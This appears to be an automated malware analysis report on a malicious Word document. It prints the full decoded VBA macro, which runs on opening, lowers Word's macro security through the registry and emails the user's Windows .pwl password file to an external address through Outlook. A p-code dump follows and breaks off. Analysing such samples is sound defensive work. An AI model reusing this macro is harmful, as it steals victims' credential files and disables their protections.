Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c0c3e1ab9dea423…

MALICIOUS

Office (OLE)

63.5 KB Created: 1999-04-19 20:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 84ba0d53f099a57021f282230185bb18 SHA-1: 4e2fb041bbb1023b2a4a42b10ed5db2e38241efe SHA-256: 9c0c3e1ab9dea423cf17357537f2993526970383630aa48b6d9d046588cff758
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a malicious Word document containing a VBA macro that executes upon opening (Document_Open). The macro attempts to create an Outlook Application object and send an email to 'neetazz86@hotmail.com' with the subject 'Pwl From <UserName>' and a body of 'Here it is'. It attaches a file named '<UserName>.pwl' located in the user's Windows directory. This behavior suggests an attempt to exfiltrate or distribute sensitive information, potentially related to password files, or to spread further via email.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5114 bytes
SHA-256: 23ded3e2614510c1de86e83d556b87fd67345d8b1bc9418b8b5b2d6959ac31c5
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_New()

End Sub

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice, GetUser, Xx
Dim ThePath As String * 255
Dim PwlPath As String

    GetUser = Application.UserName
    Xx = GetWindowsDirectory(ThePath, 255)
    PwlPath = Left(ThePath, Xx) & "\" & GetUser & ".pwl"
    
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
        
        DasMapiName.Logon
        TheAddress = "neetazz86@hotmail.com"
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        BreakUmOffASlice.Recipients.Add TheAddress
        BreakUmOffASlice.Subject = "Pwl From " & Application.UserName
        BreakUmOffASlice.Body = "Here it is"
        BreakUmOffASlice.Attachments.Add PwlPath
        BreakUmOffASlice.Send
        BreakUmOffASlice.Delete
        DasMapiName.Logoff
            
     '  Selection.TypeText PwlPath
        
   End Sub

Attribute VB_Name = "Module1"
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
'ucbC><Kd

' Processing file: /opt/analyzer/scan_staging/d5f09024d48247d0912e7e319d93cd7b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7428 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Private Sub Document_New())
' Line #3:
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' 	FuncDefn (Private Sub Document_Open())
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #9:
' 	LitVarSpecial (False)
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #10:
' 	LitDI2 0x0001 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #11:
' 	ElseBlock 
' Line #12:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #13:
' 	EndIfBlock 
' Line #14:
' Line #15:
' 	Dim 
' 	VarDefn UngaDasOutlook
' 	VarDefn DasMapiName
' 	VarDefn BreakUmOffASlice
' 	VarDefn GetUser
' 	VarDefn Xx
' Line #16:
' 	Dim 
' 	LitDI2 0x00FF 
' 	VarDefn ThePath
' Line #17:
' 	Dim 
' 	VarDefn PwlPath (As String)
' Line #18:
' Line #19:
' 	Ld Application 
' 	MemLd UserName 
' 	St GetUser 
' Line #20:
' 	Ld ThePath 
' 	LitDI2 0x00FF 
' 	ArgsLd GetWindowsDirectory 0x0002 
' 	St Xx 
' Line #21:
' 	Ld ThePath 
' 	Ld Xx 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld GetUser 
' 	Concat 
' 	LitStr 0x0004 ".pwl"
' 	Concat 
' 	St PwlPath 
' Line #22:
' Line #23:
' 	SetStmt 
' 	LitStr 0x0013 "Outlook.Application"
' 	ArgsLd CreateObject 0x0001 
' 	Set UngaDasOutlook 
' Line #24:
' 	SetStmt 
' 	LitStr 0x0004 "MAPI"
' 	Ld UngaDasOutlook 
' 	ArgsMemLd GetNameSpace 0x0001 
' 	Set DasMapiName 
' Line #25:
' Line #26:
' 	Ld DasMapiName 
' 	ArgsMemCall Logon 0x0000 
' Line #27:
' 	LitStr 0x0015 "neetazz86@hotmail.com"
' 	St TheAddress 
' Line #28:
' 	SetStmt 
' 	LitDI2 0x0000 
' 	Ld 
... (truncated)